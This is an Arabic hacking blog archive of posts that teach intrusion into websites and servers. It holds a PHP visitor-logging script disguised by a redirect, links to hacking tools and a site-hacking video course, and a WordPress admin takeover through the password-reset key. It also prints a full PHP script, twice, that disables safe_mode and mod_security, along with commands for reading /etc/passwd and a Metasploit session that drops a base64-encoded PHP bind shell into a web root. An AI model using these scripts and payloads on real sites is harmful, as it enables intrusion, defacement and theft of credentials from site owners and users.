إظهار الرسائل ذات التسميات هاكر أخلاقي. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات هاكر أخلاقي. إظهار كافة الرسائل
الثلاثاء، 22 يوليو 2014
جلب و سحب Ip و إصدار النظام و المتصفح برمجيا
السلام عليكم و رحمات الله تعالى و يركتاه سكريبت من برمجتي بيسط وظيفته سحب الأيبي و معلما النظام و إصدار المتصفح و حفظه
في ملف txt ..طيف كيف الإستخدام تحتاج إلى مساحة شيل cpanel تقدر تجربها على اللوكل الهوست بيع حفظ الملف بصيفة php
عند فتح سوف يتحول تقائيا المستخدم إلى جوجل تقدر تغيره غلى أي موقع فقظ هدا كشكل من اشكال التمويه :) وبدها سوف ينشء ملف بإسم ip_Log.txt عند فتح سوف تجد المعلومات التي تريدها سلام ..
DOwnload:
الخميس، 17 يوليو 2014
الأربعاء، 11 سبتمبر 2013
Smart Hunter v.1.4.3 New Version
Smart Hunter v.1.4.3 Puplick Version
Credit goes to .:BK:. For Nice Tool
Video Presentation of version 1.2
http://www.youtube.com/watch?v=vbnSBNTxXbM
Download Smart Hunter
http://www.mediafire.com/?4vzcbm1j7imq14d
Credit goes to .:BK:. For Nice Tool
Video Presentation of version 1.2
http://www.youtube.com/watch?v=vbnSBNTxXbM
Download Smart Hunter
http://www.mediafire.com/?4vzcbm1j7imq14d
الخميس، 29 أغسطس 2013
دورة رائعة جدا في إختراق المواقع
السلام عليكم و رحمات الله تعالى و بركتاه اليوم و انا أتجول في الأنترنت وجدت دورة رائعةجدا في إختراق
المواقع
دورة رائعة جدا في إختراق المواقع إن شاء الله تعجبكم :)
see you :)
الأربعاء، 28 أغسطس 2013
آبحث عن ثغرات وانت مرررتآآح ..
الســلآم عليكـم ورحمة الله وبركـآته ~..
مبــَآإْرك عليكـمْ الشهـرٍ ~ْ ...
هنـآ موقعيــن ~..محركـآت بحث للثغرآت ~ الصراحه مـآشفتهـآ بـ مواقعنـآ العربيــه قبل كذا .. ~ وقمــه في الروعـه ..
حط السكربت اللي تبحث عن ثغرتــه ~.. ويبحث لك في جميع موآقع السيكيورتي .. وانت مرتـآإْح
http://www.shodanhq.com/exploits/
الثـآني ~,
http://www.exploitsearch.net
جربوهـآ ~ وأعطوني رأيكــمْ ^_^
في أمـآن الله ~ دعوآتكــم ..
الأحد، 25 أغسطس 2013
للمستوى متوسط ومبتدأ { أسطوانة ShArK009 لاحتراف اختراق المواقع والسيرفرات}
إن الحمد لله نحمده ونستعينه ونستغفره ونعوذ بالله من شرور أنفسنا
وسيئات أعمالنا من يهد الله فلا مضل له ومن يضلل فلا هادى له
وأشهد أن لا إله إلا الله وحده لا شريك له وأن محمداًَ عبده ورسوله
أما بعد
بدورة لحتراف اختراق المواقع والسرفرات وباللغة العربية وهي موجهة للمستوى (مبتدأ و متوسط)
أما المتقدمين فلا تقدم لهم سوى اعادة انعاش لداكرتهم
والسبب الدي يجعل هده الدورة موجهة لهم هو
زيادة الثقة بنفسي عندما أعلم أن الهاكرز المتقدمين قد أعجبوا بالاسطوانة
كان من المفروض أن أنهي الدورة في نهاية العام 2011 لكن بسبب بعض طروف لم أستطع ولكن الحمد لله تم الانتهاء منها
الدورة مكون من 30 درسا على شكل فيديو وتتكون من
1 - الأساسيات والمصطلحات
2 - شرح الشيل
3 - اوامر الشيل والصلاحيات والتصاريح
4 - استهداف المواقع وكشف السكربيات المركبة + استخراج ملفات الموقع ولوحة التحكم باداة Linkrot
5 - استثمار الثغرات المكتوبة بال html
6 - استثمار الثغرات المكتوبة بال Perl
7 - استثمار الثغرات المكتوبة بال PHP
8 - استثمار الثغرات المكتوبة بال PythOn
9 - استثمار الثغرات المكتوبة بالـ ruby
10 - استغلال ثغرات sql
11 - استغلال ثغرات RFI
12 - استغلال ثغرات LFI ورفع شل به Forbidden مع حل مشكلة خطأ
13 - استغلال ثغرات RFU
14 - استغلال ثغرات XSS
15 - الاتصال بالقاعدة وتغيير الاندكس من خلال الشيل و Cpanel
16 - اهمية ملف config و htaccess
17 - تخطي صلاحيات اليوزر - التنقل بصلاحيات اليوزر
18 - تخطي السيف مود أون Safe_mode ON
19 - شرح رفع شيل من لوحة الادارة لـ joomla & vBulletin - wordpress
20 - استخراج حسابات Cpanel
21 - استخراج ملفات config السيرفر | بطريقتين | 22 - استخراج ملفات المنتديات config / Symlink
23 - تشفير وفك تشفير ملفات basee64 - md5
24 - فك تشفير Zend
25 - الاتصال العكسي بالسيرفر
26 - كيفية الحصول على الرروت
27 - إختراق سيرفرات الويندوز
28 - التخفي في النت
29 - كيفية تسجيل الانجازات بالزون اتش
30 - ftp (Port21) brute force + كشف البورتات المفتوحة على السيرفر : brute force الان جاء وقت التحميل
قمت برفعها على محبوب الملايين الميديافير برابط واحد
حجمه 130 Mo
http://www.mediafire.com/?busuyxg2uarab9e
دعواتكم لي بالتوفيق
في أمان الله
الاندبندنت: بريطانيا تدير قاعدة تجسس سرية بالشرق الأوسط
كشفت صحيفة الاندبندنت البريطانية اليوم أن الوثائق التي سربها الموظف السابق في الاستخبارات الأميركية ادوارد سنودن تشير إلى أن بريطانيا تدير قاعدة تجسس سرية في الشرق الأوسط بالنيابة عن وكالات الاستخبارات الغربية تقوم بالتنصت على الاتصالات الهاتفية ومراقبة الرسائل الالكترونية.
وأضافت الصحيفة أن القاعدة التي لم يتم تحديد موقعها تجمع المعلومات وترسلها إلى المركز الحكومي للاتصالات في بريطانيا وتشاركها ايضا مع وكالة الأمن القومي الأميركية.
وأشارت الصحيفة إلى أن السلطات البريطانية تعتبر قاعدة التجسس هذه عنصرا أساسيا في الحرب على الإرهاب حيث تلعب دور "منظومة إنذار مبكر عن الأخطار الممكنة في العالم".
وأضافت أن صحيفة الغارديان البريطانية وافقت على تقييد نشر وثائق سنودن ومنع نشر أي وثائق تمس الأمن القومي البريطاني واضطرت إلى إتلاف جهاز كومبيوتر احتوى نسخا من ملفات سنودن وذلك بعد أن أرسل رئيس الوزراء البريطاني ديفيد كاميرون أحد مساعديه من أجل الضغط على صحيفة الغارديان كي تتلف الوثائق السرية التي حصلت عليها من سنودن.
وقالت الاندبندنت إن الشخص الذي مارس الضغوط على صحيفة الغارديان هو جيريمي هايوود كما قام موظفان بريطانيان كبيران بالضغط على إدارة الغارديان كي تتلف الوثائق حيث قاما بزيارة للصحيفة وأكدا خلالها بوضوح أنهما جاءا باسم أعلى سلطة للمطالبة بتسلم ملفات سنودن الموجودة لدى الصحيفة على الفور.
يذكر أن سنودن سرب معلومات سرية كشفت وجود نظام مراقبة ضخم للولايات المتحدة وبريطانيا على العالم وواجهت صحيفة الغارديان البريطانية ضغوطا كبيرة لإتلاف الوثائق السرية التي حصلت عليها من سنودن حيث قامت بإتلاف الأقراص الصلبة أمام خبراء أمنيين من جهاز التصنت البريطاني في عملية وصفتها بأنها "خطوة رمزية عبثية جدا" لأن هناك نسخا اخرى بحيازة صحف أميركية وبرازيلية.
مواقع لتنزيل السكربتات وفحصها
بسم الله الرحمن الرحيم
www.opensourcescripts.com
www.hotscripts.com
www.gscripts.net
www.phpjunkyard.com
www.sitescripts.com/PHP
www.scriptsbank.com/PHP_Scripts/index.html
www.free-php.net
www.zsz.jp/script
www.hot-php-scripts.com
www.scriptcopy.com
www.dbscripts.net
www.gentlesource.com
تحياتى لكم
اليوم اقدم لكم مواقع
لتنزيل السكربتات وفحصها
واحد هيقول ايه فائدتها ؟؟؟
مثلا انا فحصت موقع الصاعقة ولقيته مركب سكربت asp هما كان نوعه
ادخل على الموقع واحمل السكربت وافحصه سواء ببرامج او يدوى
واستغل الخطا واخترق من خلاله الموقع
وهذه بعض المواقع
لتنزيل السكربتات وفحصها
واحد هيقول ايه فائدتها ؟؟؟
مثلا انا فحصت موقع الصاعقة ولقيته مركب سكربت asp هما كان نوعه
ادخل على الموقع واحمل السكربت وافحصه سواء ببرامج او يدوى
واستغل الخطا واخترق من خلاله الموقع
وهذه بعض المواقع
www.opensourcescripts.com
www.hotscripts.com
www.gscripts.net
www.phpjunkyard.com
www.sitescripts.com/PHP
www.scriptsbank.com/PHP_Scripts/index.html
www.free-php.net
www.zsz.jp/script
www.hot-php-scripts.com
www.scriptcopy.com
www.dbscripts.net
www.gentlesource.com
تحياتى لكم
لتصبح متخفي كأنك في المحيط
السلام عليكم ورحمة الله وبركاته
الاغلب لا يهتم بالتخفي رغم اتي اعتقد ان التخفي اهم من الهكر ( محشش )
حلو
نبدأ على البركة
اولا هناك بما يسمى تسرب الDNS
هذا التسرب يكشف موقعك ولو استخدمت بروكسي
يعني انتم الان لو تستخدموا الف بركسي اقدر احدد موقعكم وشكل بيتكم
ببدأ بالتخفي وكشف التسرب !
هناك موقع يقوم بهذي العملية
http://www.dnsleaktest.com/
اضغط
check
ثم سيظهر لك !
عنوان البركسي وعنوان الايبي الخاص فيك ( الموزع )
من هنا انت ( عليك تنتحر احسن لك )
الحل هو يا شباب
حملوا هذا الملف
http://www.dnsleaktest.com/dnsfixsetup.e x e
ثم شغلوه
ثم اعد الاتصال بالبركسي
واعد العملية !!
النتيجة :- لا تسرب في الdns
بكذا انت مخفي والانترنت لم يتأثر ابدا
انتهى الموضوع هنا
++++++++++++++++++++++++++++++++++++
السبت، 24 أغسطس 2013
طريقة تجاوز تشفير باسووردات الووردبريس
كيفكم يا حبااااااااااااااااااااايب قلبى
ان شاء الله من تقدم الى تقدم فى هذا المنتدى العريق
اطرح لكم اليوم طريقة لتجاوز تشفير باسوردات الوورد بريس المعقدة
فلنبدا على بركة الله
الطريقة بسيطة وشغالة مليون فى الميه
1- روح لرابط الادمن
http://www.example.com/wp-admin
2- اضغط على فقدان كلمة المرور او Lost your password?
3- جيب ايميل الادمن او ممكن باليوزر نيم هتلتقيه موجود فى (موجودة بجدول wp-user)
وبعد ما تطلب كلمة المرور
اعمل ريفريش وجيب كود من العامود user_activation_key
وادخل على الرابط دا :
http://www.example.com/wp-login.php?action=rp&key=123456789&login=adminusername
طبعا
adminusername=يوزر نيم الادمن
key=الكود اللي جبته منuser_activation_key
adminusername=يوزر نيم الادمن
key=الكود اللي جبته منuser_activation_key
وبكدا انت تقدر تعمل باسورد جديد للادمن
تحياتى
اخوكم فى الله
سكريبت يتخطى حماية 70%
السلام عليكم
معي سكريبت يتخطى حماية 70%
<?
/*
Bypass ModeSecurity Exploit
*/
echo "<b><font color='green'>[+] Start...<br>\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] Fucking Bypass Created Succes !<br> \n";
}
else{
echo "<font color='red'>[-] access denial ! <br></font> \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini Writed ! <br>\n";
}
else{
echo "<font color='red'>[-] 404 php.ini not found !<br></font> \n";
}
$breakrullz="Options Indexes FollowSymLinks
DirectoryIndex vbspiders.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"; // xD
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "<font color='green'>[+] EviL .htaccess Writing ....Done<br>\n";
echo "<font color='orange'>[+] Exploited Success!<br><br><br> \n\n\n";
echo "\t\t\t<font color='green'>[+] Edited By Aghilas -- Algeria <br>\n";
echo "\t\t\t<font color='green'>[+] Wr!ted By Hunter<br><br>\n";
echo "\t\t\t<font color='gray'> [+] somme errors was edited by aghilas <br>\n";
echo "\t\t\t<font color='blue'>[+] Greetz : ALL My Friends ...\n";
}
else{
echo "<font color='red'>[-] Evil .htaccess Not FouNd!</font>\n";
}
system("uname -a;pwd");
#EOF
?>
معي سكريبت يتخطى حماية 70%
<?
/*
Bypass ModeSecurity Exploit
*/
echo "<b><font color='green'>[+] Start...<br>\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] Fucking Bypass Created Succes !<br> \n";
}
else{
echo "<font color='red'>[-] access denial ! <br></font> \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini Writed ! <br>\n";
}
else{
echo "<font color='red'>[-] 404 php.ini not found !<br></font> \n";
}
$breakrullz="Options Indexes FollowSymLinks
DirectoryIndex vbspiders.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"; // xD
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "<font color='green'>[+] EviL .htaccess Writing ....Done<br>\n";
echo "<font color='orange'>[+] Exploited Success!<br><br><br> \n\n\n";
echo "\t\t\t<font color='green'>[+] Edited By Aghilas -- Algeria <br>\n";
echo "\t\t\t<font color='green'>[+] Wr!ted By Hunter<br><br>\n";
echo "\t\t\t<font color='gray'> [+] somme errors was edited by aghilas <br>\n";
echo "\t\t\t<font color='blue'>[+] Greetz : ALL My Friends ...\n";
}
else{
echo "<font color='red'>[-] Evil .htaccess Not FouNd!</font>\n";
}
system("uname -a;pwd");
#EOF
?>
Bypass cat /etc/passwd
السلام عليكم
بدون مقدمات
لو واجهت عدم قرائة الأمر
cat /etc/passwd
جرب هده الأوامر
========================
بدون مقدمات
لو واجهت عدم قرائة الأمر
cat /etc/passwd
جرب هده الأوامر
========================
كود:
xxd /etc/passwd rev /etc/passwd tac /etc/passwd more /etc/passwdless /etc/passwd
أقوى دورة لإكتشاف ثغرات الفيض
أقوى دورة لإكتشاف ثغرات الفيض :
http://www.mediafire.com/download/ymnmiamo1wl/Basic+Stack+BOF+%3D--+Crashing+%26+exploiting+%26+make+it+universall.rar
ثغرات buffer overflow تفيد جدا في اختراق السيرفرات لانه يتم استغلال ثغرات البرامج المركبة (المصابة)
Enjoy my Friend
الخميس، 22 أغسطس 2013
metasploit php shell
- _
- | | o
- _ _ _ _ _|_ __, , _ | | __ _|_
- / |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
- | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
- /|
- \|
- =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
- + -- --=[ 644 exploits - 328 auxiliary
- + -- --=[ 216 payloads - 27 encoders - 8 nops
- =[ svn r11722 updated 4 days ago (2011.02.08)
- msf > search php
- [*] Searching loaded modules for pattern 'php'...
- <--BIG SNIP-->
- NOP Generators
- ==============
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- php/generic normal PHP Nop Generator
- Payloads
- ========
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
- php/bind_php normal PHP Command Shell, Bind TCP (via php)
- php/download_exec normal PHP Executable Download and Execute
- php/exec normal PHP Execute Command
- php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
- php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
- php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
- php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
- php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
- php/shell_findsock normal PHP Command Shell, Find Sock
- msf > use php/bind_php
- msf payload(bind_php) > show options
- Module options (payload/php/bind_php):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LPORT 4444 yes The listen port
- RHOST no The target address
- msf payload(bind_php) > set RHOST 192.168.1.5
- RHOST => 192.168.1.5
- msf payload(bind_php) > set LPORT 4321
- LPORT => 4321
- msf payload(bind_php) > generate -h
- Usage: generate [options]
- Generates a payload.
- OPTIONS:
- -E Force encoding.
- -b <opt> The list of characters to avoid: '\x00\xff'
- -e <opt> The name of the encoder module to use.
- -f <opt> The output file name (otherwise stdout)
- -h Help banner.
- -i <opt> the number of encoding iterations.
- -k Keep the template executable functional
- -o <opt> A comma separated list of options in VAR=VAL format.
- -p <opt> The Platform for output.
- -s <opt> NOP sled length.
- -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
- -x <opt> The executable template to use
- msf payload(bind_php) > generate -t raw -e php/base64
- eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
- msf payload(bind_php) > exit
- root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.phpsec-worldweb.blogspot.com









